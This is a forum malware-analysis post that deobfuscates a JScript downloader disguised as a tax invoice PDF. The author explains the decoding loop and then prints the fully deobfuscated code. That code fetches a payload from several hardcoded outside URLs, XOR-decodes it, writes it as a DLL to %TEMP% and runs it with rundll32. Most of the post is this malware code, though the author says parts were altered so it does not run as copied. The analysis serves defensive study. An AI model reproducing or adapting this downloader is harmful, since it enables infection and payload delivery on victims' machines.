Malware Analysis Deobfuscation of script samples from MV 13-9-16 #4 (nemucod and cie)

DardiM

Level 26
Thread author
Verified
Honorary Member
Top Poster
Malware Hunter
Well-known
May 14, 2016
1,597
https://malwaretips.com/threads/13-9-16-4.63346/
(thanks to @Solarquest)

There are 3 samples that use scripts :

2 .js
3 tax_invoice_scan_PDF.B6B845F6.js
4 d7f8c742cd.html

3 and 4 are similar to
(remember, I received one wave with insults inside :) ):


2 .js is similar to :




PART 1 : tax_invoice_scan_PDF.B6B845F6.js

1) What it looks like when edited

var EIj = "__WYz~__Rv~__JXr~__GZj~__SSy~__Qx~__Ks~__JXr~__Ea~__FIn~__Dx~__UVj~__EBl~__Se~__Ea~__Ea~__Ea~__Ea~__HAb~__Tn~__EBs~__Ea~__Zq~__Lm~__Rl~__Qx~__Yb~__Rv~__Jy~__Oc~__WYz~__Rv~__Rl~__SSy~__Jy~__Oc~__Ea~__Yw~__Ea~__Qt~__Uf~__CQq~__Qt~__Vs~__Qt~__Qt~__Vs~__Qt~__GZj~__Qt~__Vs~__Qt~__EBs~__Qt~__Vs~__Qt~__Qx~__Qt~__Vs~
...
...
__Ea~__Dc~__Au~__Ge~__UVj~__Ea~__De~__Se~__Gx~__Gx~__Gx~__EBl~__St~__Gf~__Il~__FSz~__Yw~__QFr~__SSy~__Jc~__HTm~__KGb~__De~__Se~__Gx~__Gx~__FIn~__ULh~__Rl~__FIn~__Ea~__De~__Se~__Gx~__Gx~__Gx~__EBl~__St~__Gf~__Il~__FSz~__Yw~__Sh~__Qx~__Jc~__VEi~__QFr~__SSy~__Jc~__Wq~__HTm~__KGb~__De~__Se~__Gx~__Gx~__Sh~__Rv~__TDz~__TKe~__Rv~__Rl~__Lm~__Dx~__CQq~__SSy~__EBs~__Qx~__JXr~__Oc~__VEi~__DOy~__LGt~__Gp~__IDo~__Ea~__Vs~__Ea~__Ex~__Yr~__Rv~__Ea~__Vs~__Ea~__ITu~__Bi~__Tn~__FCk~__Wq~__Dx~__St~__Gf~__Il~__FSz~__UVj~__UVj~__HTm~__De~__Se~__Gx~__KGb~__De~__Se~__Gx~__De~__Se~__Gx~__Ex~__JXr~__Au~__Yw~__Sh~__Rv~__VEi~__Js~__CYg~__HAb~__Wk~__Wq~__Dx~__Qt~__Qt~__UVj~__HTm~__De~__Se~__Gx~__De~__Se~__Gx~__EBs~__FIn~__SSy~__Rv~__EBs~__JXr~__Ea~__Ex~__JXr~__Au~__HTm~__De~__Se~__KGb~__HTm~__De~__Se~__De~__Se".split('~');

var Fh = "";
var Ar = {
"__Se": (1, "\x0a"),
"__De": (1, "\x0d"),
"__CXb": (1, "D"),
"__GVc": (1, "H"),
"__Js": (1, "L"),
"__LGt": (1, "P"),
"__Jt": (1, "T"),
"__Bi": (1, "X"),
"__Gx": (1, "\x09"),
"__Jy": (1, "d"),
"__Lm": (1, "h"),
"__ULh": (1, "l"),
"__TKe": (1, "p"),
"__SSy": (1, "t"),
"__KGb": (1, "\x7d"),
"__KVp": (1, "\x7c"),
"__EBl": (1, "\x7b"),
"__Aj": (1, "\x2f"),
"__SYo": (1, "\x2d"),
"__TDz": (1, "\x2e"),
"__Vs": (1, "\x2b"),
"__TYm": (1, "\x2c"),
"__By": (1, "\x2a"),
"__CYg": (1, "C"),
"__Ex": (1, "G"),
"__DOy": (1, "K"),
"__SVx": (1, "O"),
"__CQq": (1, "S"),
"__Wy": (1, "\x25"),
"__Qt": (1, "\x22"),
"__Uf": (1, "W"),
"__Il": (1, "x"),
"__Dx": (1, "\x28"),
"__UVj": (1, "\x29"),
"__GZj": (1, "c"),
"__Oc": (1, "g"),
"__XEs": (1, "k"),
"__Ks": (1, "o"),
"__Rl": (1, "s"),
"__PAb": (1, "w"),
"__Ea": (1, "\x20"),
"__Yy": (1, "\x21"),
"__Dc": (1, "\x31"),
"__SJu": (1, "\x30"),
"__FSz": (1, "\x33"),
"__Au": (1, "\x32"),
"__Jc": (1, "\x35"),
"__IDo": (1, "\x34"),
"__Wk": (1, "\x37"),
"__VQt": (1, "\x36"),
"__FCk": (1, "\x39"),
"__Ge": (1, "\x38"),
"__Yd": (1, "\x3a"),
"__Uw": (1, "\x3c"),
"__HTm": (1, "\x3b"),
"__EUx": (1, "\x3e"),
"__Yw": (1, "\x3d"),
"__ITu": (1, "F"),
"__AKo": (1, "J"),
"__QFr": (1, "N"),
"__Nv": (1, "R"),
"__Sh": (1, "V"),
"__Id": (1, "Z"),
"__ZNc": (1, "b"),
"__TSe": (1, "\x40"),
"__WYz": (1, "f"),
"__Xg": (1, "j"),
"__JXr": (1, "n"),
"__EBs": (1, "r"),
"__HAb": (1, "v"),
"__TTk": (1, "z"),
"__Gf": (1, "B"),
"__Rv": (1, "u"),
"__WFm": (1, "A"),
"__ZIf": (1, "E"),
"__St": (1, "I"),
"__OPd": (1, "M"),
"__Oe": (1, "Q"),
"__Yr": (1, "U"),
"__QGw": (1, "Y"),
"__Tn": (1, "a"),
"__FIn": (1, "e"),
"__Qx": (1, "i"),
"__Ph": (1, "m"),
"__Gp": (1, "q"),
"__Zq": (1, "\x5f"),
"__La": (1, "\x5e"),
"__Wq": (1, "\x5d"),
"__Hm": (1, "\x5c"),
"__VEi": (1, "\x5b"),
"__Yb": (1, "y")
};

var Tg;
for (Tg = 0; Tg < EIj["l" + "e" + "n" + "g" + "th"]; Tg++) {
GWu = EIj[Tg];
Fh = (43, 35, Fh) + (25, 35, Ar[GWu]);
}

eval(Fh);

2) Explanations :

var EIj = " .........................".split('~');

=> A tab with the string as parameter, splited at each ('~') chars.
=> A tab of small strings

__WYz
__Rv
__JXr
__GZj
__SSy
__Qx
etc,..

var Fh = "";

=> used to get the first deobfuscated string of code
var Ar = {
"__Se": (1, "\x0a"),
"__De": (1, "\x0d"),

...
...
};

=> used as char replacement​

var Tg;

=> index for the for Loop

for (Tg = 0; Tg < EIj["l" + "e" + "n" + "g" + "th"]; Tg++) {
GWu = EIj[Tg];
Fh = (43, 35, Fh) + (25, 35, Ar[GWu]);
}

=> can be written in a simplified way :


for (Tg = 0; Tg < EIj.length ; Tg++) {

GWu = EIj[Tg];
Fh = Fh + Ar[GWu]);
}

=> a Loop on each data of the first tab, each value is used as a key to retrieve the real value from the second Tab.


Example :

GWu = EIj[0];

=> __WYz

this key is searched on the second tab : Ar[GWu]

=> "__WYz": (1, "f"), <=> key: value

the way it's written on the second tab, is to obfuscate a bit more : (1, "f") => "f"

So each __WYz correspond to a "f"
Fh = Fh + Ar[GWu]);

=> concatenation / build of the "real part" put on Fh var
Example : the first chars : "function e()"

eval(Fh);

=> the string build by the loop, and in the var Fh, is evaluated => functions linked to real infection are run.


3) What it looks like after first deobfuscation :


function e() {
var _hsiyudgfustdg = "WS" + "" + "c" + "r" + "i" + "pt";
var _c = "\%Sy" + "st" + "" + "em" + "Root\%\\s" + "ystem32\\cmd." + "ex" + "e";
var _87867t67t6gt = this[_hsiyudgfustdg]["Cre"+"ateOb"+"ject"](_hsiyudgfustdg+".She"+"ll");
var _87g6sd5fg = _87867t67t6gt["En" + "vi" + "" + "ron" + "men" + "t"]("SY" + "S" + "T" + "E" + "M");
var _dd = _87g6sd5fg("Com" + "S" + "" + "pe" + "c");
if (_dd == _c) {
return 1;
} else {
this[this["_hsiyudgfustdg"]]["Qui" + "" + "t"](1);
};
}

e();


var LCv7 = "join" + "";
var FXa9 = "Code" + "";
var GUu = "har" + "";
var KPq4 = "fromC" + "";
var XQg1 = "ngth" + "";
var QLf = "le" + "";
var PVc6 = "close" + "";
var UEs = "le" + "";
var Oc = "ToFi" + "";
var Sr = "Save" + "";
var Zp5 = "Text" + "";
var Ia = "write" + "";
var Oy1 = "open" + "";
var QGo = "et" + "";
var MHl3 = "Chars" + "";
var Fd9 = "type" + "";
var NKk = "am" + "";
var St1 = "Stre" + "";
var TSw = "DB." + "";
var Zm = "O" + "";
var Nl9 = "D" + "";
var Tn8 = "A" + "";
var MJt = "ct" + "";
var Kk7 = "eObje" + "";
var REk = "Creat" + "";
var BUj = "push" + "";
var XUy3 = "eAt" + "";
var DOz = "Cod" + "";
var Ar5 = "char" + "";
var Iw = "gth" + "";
var Va = "len" + "";
var PGi5 = "ose" + "";
var EPt8 = "cl" + "";
var WGl5 = "Text" + "";
var Sp3 = "Read" + "";
var YRr3 = "mFile" + "";
var Yz0 = "ro" + "";
var YWz = "dF" + "";
var Uc = "Loa" + "";
var OCv5 = "n" + "";
var FJh = "ope" + "";
var Nr9 = "t" + "";
var Jw = "rse" + "";
var Ci6 = "Cha" + "";
var XOr5 = "type" + "";
var DJb6 = "am" + "";
var Ck = ".Stre" + "";
var YSr = "DB" + "";
var Lv2 = "O" + "";
var Vf = "D" + "";
var BFq6 = "A" + "";
var Oo2 = "ect" + "";
var BBi = "bj" + "";
var NRe5 = "ateO" + "";
var Jn3 = "Cre" + "";
var WXl8 = "h" + "";
var Yq0 = "lengt" + "";
var Lc0 = "ngth" + "";
var Wz = "le" + "";
var Re = "ice" + "";
var Ea0 = "spl" + "";
var JRe = "th" + "";
var JPf2 = "leng" + "";
var UKa = "th" + "";
var ECj5 = "leng" + "";
var JAu = "gth" + "";
var Lx = "len" + "";
var YBc = "th" + "";
var ZDn6 = "leng" + "";
var Kj = "th" + "";
var Oj = "leng" + "";
var Rs = "ep" + "";
var CNo5 = "Sle" + "";
var Yg1 = "23" + "";
var Pa = " 3" + "";
var Cg = "ty" + "";
var Pv3 = "er" + "";
var Eg = ",qw" + "";
var Aw6 = " " + "";
var NKm = "n" + "";
var TFn = "Ru" + "";
var Ir = "th" + "";
var Kp = "leng" + "";
var WZg = "th" + "";
var LVk = "ng" + "";
var Nr = "le" + "";
var Bs5 = "ose" + "";
var Zg0 = "cl" + "";
var St0 = "e" + "";
var He = "Fil" + "";
var CKl8 = "veTo" + "";
var Cf3 = "Sa" + "";
var WMi = "ion" + "";
var Ym = "posit" + "";
var SKa9 = "dy" + "";
var ZYz = "Bo" + "";
var XTy = "nse" + "";
var PAw1 = "Respo" + "";
var Js = "ite" + "";
var DQq = "wr" + "";
var TGb7 = "type" + "";
var RXm8 = "open" + "";
var ZJo = "eam" + "";
var Ba1 = "Str" + "";
var OPp = "DB." + "";
var Vm6 = "O" + "";
var EJz = "D" + "";
var Hz = "A" + "";
var KUa = "ject" + "";
var EBq9 = "eOb" + "";
var HHk = "Creat" + "";
var CPi = "Sleep" + "";
var Sy3 = "d" + "";
var Yp = "sen" + "";
var Po = "th" + "";
var NXj9 = "leng" + "";
var Gg = "T" + "";
var YPc = "GE" + "";
var DFa = "open" + "";
var TYr1 = "ngth" + "";
var Cl1 = "le" + "";
var Pi9 = "Quit" + "";
var FXo = "cript" + "";
var DAn2 = "WS" + "";
var YIa = "xists" + "";
var Qb8 = "leE" + "";
var Vn1 = "Fi" + "";
var Yu = "xt" + "";
var Hs = ".t" + "";
var Lp = "sts" + "";
var LLv = "eExi" + "";
var Te2 = "Fil" + "";
var YHq9 = "ject" + "";
var VTi = "mOb" + "";
var DVr = "te" + "";
var Qc0 = "Sys" + "";
var JRt8 = ".File" + "";
var HHy = "ting" + "";
var WHr0 = "Scrip" + "";
var DCx = "ct" + "";
var MRa = "eObje" + "";
var XHv = "Creat" + "";
var QUd3 = "h" + "";
var Kl = "gt" + "";
var IOi = "len" + "";
var DFe5 = "t.5.1" + "";
var Nq0 = "eques" + "";
var Sz9 = "pR" + "";
var Yu8 = "tt" + "";
var OJe1 = "WinH" + "";
var EMb = "ttp." + "";
var Mu = "WinH" + "";
var Jm1 = "P" + "";
var IVz = "MLHTT" + "";
var Ty0 = "2.X" + "";
var Bp = "ML" + "";
var LCo = "MSX" + "";
var IZr = "or" + "";
var FAt8 = "flo" + "";

var YZa3 = "%SystemRoot%\\system32\\rundll32.exe" + "";
var ZUi4 = "%SystemRoot%\\SysWOW64\\rundll32.exe" + "";

var QNu = "d64" + "";
var ZEn2 = "am" + "";
var Vn0 = "RE" + "";
var LGx0 = "TECTU" + "";
var DSl = "RCHI" + "";
var GNu0 = "R_A" + "";
var Jz = "CESSO" + "";
var Cd = "PRO" + "";
var Nu = "tem" + "";
var KPm = "Sys" + "";
var Ay1 = "ll" + "";
var Dc = ".d" + "";
var Ag = "rY" + "";
var DXl1 = "EZP" + "";
var TPc8 = "wQ" + "";
var Ri6 = "VfqAQ" + "";
var OPo = "P%/" + "";
var Nz = "%TEM" + "";
var Tp7 = "ll" + "";
var PVg7 = ".She" + "";
var OHb = "pt" + "";
var Fk = "ri" + "";
var LSk = "WSc" + "";
var Xf0 = "ect" + "";
var Lf4 = "eObj" + "";
var MOq = "Creat" + "";
var Lc = "gb" + "";
var Ty = "gn" + "";
var QNd = "72" + "";
var Td = "om/f" + "";
var VPw3 = "y.c" + "";
var QXr = "ym" + "";
var Ik = "eh" + "";
var Zn1 = "il" + "";
var DVp = "m" + "";
var AZz = "/s" + "";
var Hl = ":/" + "";
var PDr = "http" + "";
var Ze8 = "ngb" + "";
var RHj = "/f72g" + "";
var UOz = "m" + "";
var Pu9 = "co" + "";
var LLy5 = "y." + "";
var IGq = "hym" + "";
var Cn = "ile" + "";
var MQh7 = "sm" + "";
var NHe3 = "/" + "";
var FAi2 = ":/" + "";
var AYh4 = "tp" + "";
var Ur8 = "ht" + "";
var Dn5 = "t" + "";
var VHj4 = "m1" + "";
var NZa2 = "b9" + "";
var TKb3 = "m/" + "";
var Vc2 = "o" + "";
var MEw1 = ".c" + "";
var YXv5 = "id" + "";
var Ak = "elr" + "";
var Po3 = "u" + "";
var QSu = "/d" + "";
var Ow4 = ":/" + "";
var WBq = "p" + "";
var ZCl = "htt" + "";
var Ls4 = "gk" + "";
var Dr = "d7" + "";
var Dq = "ds" + "";
var AGi8 = "om/" + "";
var LMc = "y.c" + "";
var Tv = "ur" + "";
var RHg6 = "dzeb" + "";
var Hu1 = "/a" + "";
var Rf = ":/" + "";
var SQk2 = "tp" + "";
var TAh2 = "ht" + "";
var Ta1 = "3ib4f" + "";
var Ad8 = "/e" + "";
var Gg2 = "et" + "";
var OIy = ".n" + "";
var DFt2 = "en" + "";
var HTq6 = "ay" + "";
var Za = "yd" + "";
var Tp6 = "://ma" + "";
var EQm1 = "tp" + "";
var LYu = "ht" + "";
var RUp6 = "437" + "";
var HAj = "th" + "";
var GZc = "ng" + "";
var Yq = "le" + "";
var YRz = "5" + "";
var Vo3 = "55" + "";
var HEk4 = "5555" + "";
var Pm2 = "5555" + "";
var OXa = "55555" + "";
var PAj0 = "5555" + "";
var Sq = "55" + "";
var Wh8 = "55" + "";
var AGf5 = "555" + "";
var ZIv = "555" + "";
var Ht4 = "55555" + "";
var Pe = "55555" + "";
var FLt = "5555" + "";
var JFt3 = "55555" + "";
var NRs4 = "55555" + "";
var Dm = "sfd" + "";
var Kh = "dfa" + "";
var Wm7 = "asfas" + "";
var Vc = "th" + "";
var Yf = "leng" + "";
var CTd5 = "55555" + "";
var Av = "gth" + "";
var ZJb = "len" + "";
var Bl8 = "5555" + "";
var Hg = "55555" + "";
var IOu = "5555" + "";
var KHx = "55" + "";
var Sd = "55" + "";
var QFz9 = "55555" + "";
var Bq = "5555" + "";
var Tz9 = "132" + "";
var Ai = "1123" + "";
var Xl3 = (Ai + Tz9, Bq + QFz9 + Sd + KHx + IOu + Hg + Bl8);
var ELs = Xl3[ZJb + Av];
var NQf6 = (CTd5);
var Uw = [18807, 7552, 23965];
var Nf = NQf6[ZJb + Av];
var SPz0 = (Wm7 + Kh + Dm, NRs4 + JFt3 + FLt + Pe + Ht4 + ZIv + AGf5 + Wh8 + Sq + PAj0 + OXa + Pm2 + HEk4 + Vo3 + YRz);
var QAl8 = SPz0[ZJb + Av];
var XWe = 1;
var DAb4 = 2;
var GLq = 2;
var MBi0 = "437";
var TIk = [LYu + EQm1 + Tp6 + Za + HTq6 + DFt2 + OIy + Gg2 + Ad8 + Ta1, TAh2 + SQk2 + Rf + Hu1 + RHg6 + Tv + LMc + AGi8 + Dq + Dr + Ls4, TAh2 + SQk2 + Ow4 + QSu + Po3 + Ak + YXv5 + MEw1 + Vc2 + TKb3 + NZa2 + VHj4 + Dn5, TAh2 + SQk2 + FAi2 + NHe3 + MQh7 + Cn + IGq + LLy5 + Pu9 + UOz + RHj + Ze8, TAh2 + SQk2 + Hl + AZz + DVp + Zn1 + Ik + QXr + LMc + Td + QNd + Ty + Lc];
var MTm6 = WScript[MOq + Lf4 + Xf0](LSk + Fk + OHb + PVg7 + Tp7);
var Io = MTm6.ExpandEnvironmentStrings(Nz + OPo);
var Lp9 = Io + Ri6 + TPc8 + DXl1 + Ag;
var IVi2 = Lp9 + Dc + Ay1;
var Ww = MTm6.Environment(KPm + Nu);
if (Ww(Cd + Jz + GNu0 + DSl + LGx0 + Vn0).toLowerCase() == "amd64") {

var ENa6 = MTm6.ExpandEnvironmentStrings(ZUi4);
} else {
var ENa6 = MTm6.ExpandEnvironmentStrings(YZa3);
}

function random(range, s) {

s[0] = 171 * s[-6915 + 6915] % 30269;
s[1] = (5745 - 5573) * s[1] % 30307;
s[2] = 170 * s[2] % 30323;
var r = (s[0] / 30269 + s[4353 - 4352] / 30307 + s[2] / 30323) % 1.0;
return Math[FAt8 + IZr](r * range);
}

var Zm6 = [LCo + Bp + Ty0 + IVz + Jm1, Mu + EMb + OJe1 + Yu8 + Sz9 + Nq0 + DFe5];

for (var OPr3 = 0; OPr3 < Zm6[ZJb + Av]; OPr3++) {

try {
var Ma6 = WScript[MOq + Lf4 + Xf0](Zm6[OPr3]);
break;
} catch (e) {
continue;
}
};

var El = "";
var fso = new ActiveXObject(WHr0 + HHy + JRt8 + Qc0 + DVr + VTi + YHq9);
var WBe = Uw.slice();
WBe[0] = Math.random() * 29999 | 0;
var Em = 0;
do {

if (fso[Te2 + LLv + Lp](IVi2)) {
var Uv = fso.GetFile(IVi2);
var Lj4 = Uv.ShortPath;
El = Lj4 + Hs + Yu;
if (fso[Te2 + LLv + Lp](El )) {
this[DAn2 + FXo][Pi9](0);
}
}
try {
if (0 == Em) {
var Gr = random_(TIk[ZJb + Av], WBe);
Ma6[DFa](YPc + Gg, TIk[Gr++ % TIk[ZJb + Av]], false);
Ma6[Yp + Sy3]();
while (Ma6.readystate < (1 * 4)) WScript[CPi](6 * 16 + 4);
var UFn4 = WScript[MOq + Lf4 + Xf0](Hz + EJz + Vm6 + OPp + Ba1 + ZJo);
UFn4[DFa]();
UFn4[TGb7] = XWe;
UFn4[DQq + Js](Ma6[PAw1 + XTy + ZYz + SKa9]);
UFn4[Ym + WMi] = 0;
UFn4[Cf3 + CKl8 + He + St0](Lp9 , GLq);
UFn4[Zg0 + Bs5]();
var JEc3 = HIi(Lp9 );
JEc3 = Kx1(JEc3);
if (JEc3[ZJb + Av] < (2703 - 2603) * 1024 || JEc3[ZJb + Av] > (74 * 3 + 8) * 1024) {
continue;
}
OMb(IVi2, JEc3);
Em = 1;
}
var Uv = fso.GetFile(IVi2);
var Lj4 = Uv.ShortPath;
MTm6[TFn + NKm](ENa6 + Aw6 + Lj4 + Eg + Pv3 + Cg + Pa + Yg1);
WScript.Sleep(20000);
} catch (e) {
WScript[CPi](1000);
continue;
};
} while (1);
WScript.Quit(0);

function Kx1(IGv7) {
var Fm;
var AJf = Uw.slice();
for (var OPr3 = 6780 - 6780; OPr3 < IGv7[ZJb + Av]; OPr3++) {
IGv7[OPr3] ^= random(256, AJf);
}
var Yz = IGv7[IGv7[ZJb + Av] - 4] | IGv7[IGv7[ZJb + Av] - 3] << 8 | IGv7[IGv7[ZJb + Av] - 2] << 16 | IGv7[IGv7[ZJb + Av] - 1] << 24;
IGv7[Ea0 + Re](JEc3[ZJb + Av] - 4, 4);
Fm = ELs;
for (var OPr3 = 0; OPr3 < IGv7[ZJb + Av]; OPr3++) {

Fm = (Fm + IGv7[OPr3]) % 1000000000;
};
if (Fm != Yz) {
return [];
};
return IGv7;
};

function HIi(IDz0) {

var CJf2 = WScript[MOq + Lf4 + Xf0](Hz + EJz + Vm6 + OPp + Ba1 + ZJo);
CJf2[TGb7] = DAb4;
CJf2[Ci6 + Jw + Nr9] = MBi0;
CJf2[DFa]();
CJf2[Uc + YWz + Yz0 + YRr3](IDz0);
var Nq = CJf2[Sp3 + WGl5];
CJf2[Zg0 + Bs5]();
return IGi2 (Nq);
};

function IGi2 (MOk3) {

var HFw3 = new Array();
HFw3[199] = 128;
HFw3[12 * 21] = -9198 + 9327;
HFw3[233] = 130;
HFw3[226] = 131;
HFw3[47 * 4 + 40] = 1687 - 1555;
HFw3[72 * 3 + 8] = 7628 - 7495;
HFw3[229] = 134;
HFw3[75 * 3 + 6] = 135;
HFw3[234] = 136;
HFw3[235] = 137;
HFw3[232] = 138;
HFw3[239] = 139;
HFw3[238] = 140;
HFw3[69 * 3 + 29] = 141;
HFw3[196] = 142;
HFw3[197] = 143;
HFw3[201] = -1186 + 1330;
HFw3[230] = 145;
HFw3[198] = 8314 - 8168;
HFw3[244] = 5317 - 5170;
HFw3[246] = 148;
HFw3[242] = 149;
HFw3[8816 - 8565] = -1779 + 1929;
HFw3[249] = 151;
HFw3[255] = -145 + 297;
HFw3[214] = 153;
HFw3[92 * 2 + 36] = -7038 + 7192;
HFw3[162] = 155;
HFw3[679 - 516] = 156;
HFw3[165] = 157;
HFw3[8359] = 158;
HFw3[-2719 + 3121] = 159;
HFw3[225] = 160;
HFw3[237] = 161;
HFw3[243] = 162;
HFw3[53 * 4 + 38] = 55 * 2 + 53;
HFw3[241] = 164;
HFw3[209] = 165;
HFw3[170] = 166;
HFw3[186] = 167;
HFw3[191] = 168;
HFw3[11942 - 2966] = 81 + 88;
HFw3[172] = 170;
HFw3[189] = 171;
HFw3[188] = 172;
HFw3[161] = 173;
HFw3[5240 - 5069] = 174;
HFw3[799 - 612] = 175;
HFw3[9617] = 176;
HFw3[13946 - 4328] = 177;
HFw3[15854 - 6235] = 9207 - 9029;
HFw3[9474] = 179;
HFw3[9508] = 180;
HFw3[9569] = 52 * 3 + 25;
HFw3[9570] = 1117 - 935;
HFw3[9558] = 183;
HFw3[9557] = 10 * 18 + 4;
HFw3[9571] = 185;
HFw3[9553] = 186;
HFw3[9559] = 187;
HFw3[9565] = 1929 - 1741;
HFw3[9564] = 189;
HFw3[9563] = 190;
HFw3[9488] = 191;
HFw3[9492] = 192;
HFw3[9524] = 193;
HFw3[11929 - 2413] = 194;
HFw3[9500] = 41 * 4 + 31;
HFw3[9472] = -2762 + 2958;
HFw3[9532] = 1441 - 1244;
HFw3[9566] = -8051 + 8249;
HFw3[14992 - 5425] = 199;
HFw3[9562] = 8 * 25;
HFw3[9556] = 1326 - 1125;
HFw3[9577] = 86 * 2 + 30;
HFw3[9574] = -8592 + 8795;
HFw3[10414 - 846] = 96 * 2 + 12;
HFw3[9552] = 26 * 7 + 23;
HFw3[19345 - 9765] = 206;
HFw3[9575] = 207;
HFw3[7526 + 2050] = 208;
HFw3[9572] = 209;
HFw3[3063 + 6510] = 1488 - 1278;
HFw3[9561] = 211;
HFw3[9560] = 212;
HFw3[9554] = 213;
HFw3[9555] = 214;
HFw3[9579] = 215;
HFw3[4261 * 2 + 1056] = 216;
HFw3[9496] = 217;
HFw3[8068 + 1416] = 218;
HFw3[9608] = 219;
HFw3[9604] = -2198 + 2418;
HFw3[9612] = 221;
HFw3[9616] = 222;
HFw3[10749 - 1149] = 93 * 2 + 37;
HFw3[945] = -3876 + 4100;
HFw3[223] = 4571 - 4346;
HFw3[915] = 226;
HFw3[960] = 227;
HFw3[931] = 7833 - 7605;
HFw3[462 * 2 + 39] = 229;
HFw3[181] = 230;
HFw3[964] = 231;
HFw3[439 * 2 + 56] = 232;
HFw3[920] = 233;
HFw3[3951 - 3014] = 67 * 3 + 33;
HFw3[948] = 235;
HFw3[8734] = 236;
HFw3[966] = -1535 + 1772;
HFw3[949] = 238;
HFw3[8745] = 239;
HFw3[8801] = -7783 + 8023;
HFw3[177] = 241;
HFw3[8805] = 4104 - 3862;
HFw3[8804] = 243;
HFw3[8992] = 81 * 3 + 1;
HFw3[8993] = 245;
HFw3[5715 - 5468] = 246;
HFw3[160 + 8616] = 247;
HFw3[176] = 248;
HFw3[1711 * 5 + 174] = 4708 - 4459;
HFw3[183] = 43 * 5 + 35;
HFw3[8730] = 251;
HFw3[8319] = -4633 + 4885;
HFw3[178] = 253;
HFw3[9632] = 254;
HFw3[4389 - 4229] = 255;
var JEc3 = new Array();
for (var OPr3 = 9924 - 9924; OPr3 < MOk3[ZJb + Av]; OPr3++) {
var IBx3 = MOk3[Ar5 + DOz + XUy3](OPr3);
if (IBx3 < 128) {
var Nt5 = IBx3;
} else {
var Nt5 = HFw3[IBx3];
}
JEc3[BUj](Nt5);
};
return JEc3;
};

function OMb(IDz0, IGv7) {

var CJf2 = WScript[MOq + Lf4 + Xf0](Hz + EJz + Vm6 + OPp + Ba1 + ZJo);
CJf2[TGb7] = DAb4;
CJf2[Ci6 + Jw + Nr9] = MBi0;
CJf2[DFa]();
CJf2[Ia + Zp5](St(IGv7));
CJf2[Cf3 + CKl8 + He + St0](IDz0, 2);
CJf2[Zg0 + Bs5]();
};

function St(IGv7) {

var Vi5 = new Array();
Vi5[128] = 6991 - 6792;
Vi5[129] = 32 * 7 + 28;
Vi5[130] = 233;
Vi5[131] = 226;
Vi5[132] = 228;
Vi5[133] = 224;
Vi5[134] = 4413 - 4184;
Vi5[135] = 231;
Vi5[136] = -6547 + 6781;
Vi5[137] = 235;
Vi5[138] = 1841 - 1609;
Vi5[139] = 239;
Vi5[140] = 4600 - 4362;
Vi5[141] = 236;
Vi5[142] = 196;
Vi5[143] = 197;
Vi5[144] = 14 * 14 + 5;
Vi5[145] = 230;
Vi5[146] = 2664 - 2466;
Vi5[147] = 244;
Vi5[148] = 246;
Vi5[149] = 242;
Vi5[150] = 251;
Vi5[151] = 249;
Vi5[-2390 + 2542] = 255;
Vi5[153] = 19 * 11 + 5;
Vi5[154] = 220;
Vi5[155] = 162;
Vi5[-6579 + 6735] = 163;
Vi5[157] = 165;
Vi5[158] = 8902 - 543;
Vi5[159] = 402;
Vi5[37 * 4 + 12] = 225;
Vi5[18 * 8 + 17] = 237;
Vi5[162] = 243;
Vi5[4639 - 4476] = 250;
Vi5[164] = 241;
Vi5[-8144 + 8309] = 209;
Vi5[166] = 170;
Vi5[167] = 186;
Vi5[168] = 191;
Vi5[169] = 2864 * 3 + 384;
Vi5[170] = -7529 + 7701;
Vi5[171] = 189;
Vi5[23 * 7 + 11] = 188;
Vi5[173] = 161;
Vi5[-7531 + 7705] = 5717 - 5546;
Vi5[8097 - 7922] = 187;
Vi5[176] = 9617;
Vi5[177] = 9618;
Vi5[178] = 9619;
Vi5[9440 - 9261] = 14406 - 4932;
Vi5[180] = 9508;
Vi5[38 * 4 + 29] = 9569;
Vi5[182] = 9570;
Vi5[183] = 2459 + 7099;
Vi5[-2797 + 2981] = 9557;
Vi5[7134 - 6949] = 9571;
Vi5[51 * 3 + 33] = 9553;
Vi5[187] = 2337 + 7222;
Vi5[7339 - 7151] = 2995 + 6570;
Vi5[8 * 23 + 5] = 4289 * 2 + 986;
Vi5[190] = 4443 * 2 + 677;
Vi5[191] = 13066 - 3578;
Vi5[8581 - 8389] = 9492;
Vi5[193] = 9524;
Vi5[-109 + 303] = 9516;
Vi5[195] = 9500;
Vi5[81 * 2 + 34] = 18257 - 8785;
Vi5[197] = 9532;
Vi5[198] = 9566;
Vi5[199] = 9567;
Vi5[200] = 9562;
Vi5[201] = 9556;
Vi5[202] = 9067 + 510;
Vi5[203] = 9574;
Vi5[-6477 + 6681] = 9568;
Vi5[205] = 9552;
Vi5[60 * 3 + 26] = 4780 * 2 + 20;
Vi5[207] = 9575;
Vi5[208] = 9576;
Vi5[7238 - 7029] = 9572;
Vi5[210] = 9573;
Vi5[9163 - 8952] = 9561;
Vi5[6673 - 6461] = 9560;
Vi5[213] = 1621 + 7933;
Vi5[214] = 9555;
Vi5[2756 - 2541] = 9579;
Vi5[216] = 9578;
Vi5[217] = 9496;
Vi5[218] = 9484;
Vi5[219] = 300 + 9308;
Vi5[220] = 9604;
Vi5[90 + 131] = 9612;
Vi5[222] = 6276 + 3340;
Vi5[223] = 9600;
Vi5[224] = 945;
Vi5[225] = 223;
Vi5[226] = 915;
Vi5[227] = 960;
Vi5[9857 - 9629] = 931;
Vi5[10135 - 9906] = 963;
Vi5[104 * 2 + 22] = 181;
Vi5[231] = 964;
Vi5[47 * 4 + 44] = 2933 - 1999;
Vi5[233] = 920;
Vi5[234] = 937;
Vi5[235] = 948;
Vi5[236] = 8734;
Vi5[-2378 + 2615] = 966;
Vi5[238] = 949;
Vi5[6668 - 6429] = 8745;
Vi5[-2938 + 3178] = 8801;
Vi5[241] = -5759 + 5936;
Vi5[93 * 2 + 56] = 8805;
Vi5[6019 - 5776] = 8804;
Vi5[244] = 18481 - 9489;
Vi5[245] = 8993;
Vi5[246] = 247;
Vi5[247] = 1374 + 7402;
Vi5[248] = 176;
Vi5[249] = 8729;
Vi5[250] = 2841 - 2658;
Vi5[251] = 8730;
Vi5[-2317 + 2569] = 8319;
Vi5[253] = 71 * 2 + 36;
Vi5[-6173 + 6427] = 9632;
Vi5[255] = 1237 - 1077;
var Vu = new Array();
var Gn2 = "";
var Nt5;
var IBx3;
for (var OPr3 = 1 * 0; OPr3 < IGv7[ZJb + Av]; OPr3++) {
Nt5 = IGv7[OPr3];
if (Nt5 < 128) {
IBx3 = Nt5;
} else {
IBx3 = Vi5[Nt5];
}
Vu.push(String[KPq4 + GUu + FXa9](IBx3));
}
Gn2 = Vu[LCv7]("");
return Gn2;
};

As usual I modified some parts to avoid copy-paste => save => run => infection :oops:
